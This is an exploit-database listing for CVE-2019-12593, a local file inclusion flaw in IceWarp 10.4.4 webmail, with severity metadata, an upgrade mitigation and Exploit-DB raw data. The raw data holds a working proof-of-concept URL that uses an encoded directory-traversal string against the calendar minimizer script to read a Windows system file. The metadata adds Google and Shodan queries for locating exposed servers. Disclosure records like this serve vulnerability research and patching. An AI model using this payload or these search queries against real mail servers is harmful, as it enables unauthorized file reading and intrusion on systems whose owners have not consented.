header-logo
Suggest Exploit
vendor:
IceWarp
by:
JameelNabbo
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: IceWarp
Affected Version From: 10.4.2004
Affected Version To: 10.4.2004
Patch Exists: NO
Related CWE: CVE-2019-12593
CPE: a:icewarp:icewarp:10.4.4
Metasploit:
Other Scripts:
Tags: packetstorm,cve,cve2019,lfi,icewarp
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei References: https://github.com/JameelNabbo/exploits/blob/master/IceWarp10.4.4localfileinclude.txthttp://www.icewarp.comhttps://nvd.nist.gov/vuln/detail/CVE-2019-12593http://packetstormsecurity.com/files/153161/IceWarp-10.4.4-Local-File-Inclusion.html
Nuclei Metadata: {'max-request': 2, 'google-query': 'Powered By IceWarp 10.4.4', 'shodan-query': 'title:"icewarp"', 'vendor': 'icewarp', 'product': 'mail_server'}
Platforms Tested: Windows 10
2019

IceWarp <=10.4.4 local file include

The IceWarp version 10.4.4 is vulnerable to local file inclusion. An attacker can exploit this vulnerability by including local files and executing arbitrary code. This vulnerability has been assigned CVE-2019-12593.

Mitigation:

Upgrade to a patched version of IceWarp (version > 10.4.4).
Source

Exploit-DB raw data:

# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:

http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]

Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

Navigation

Suggest Exploit

Services By CQR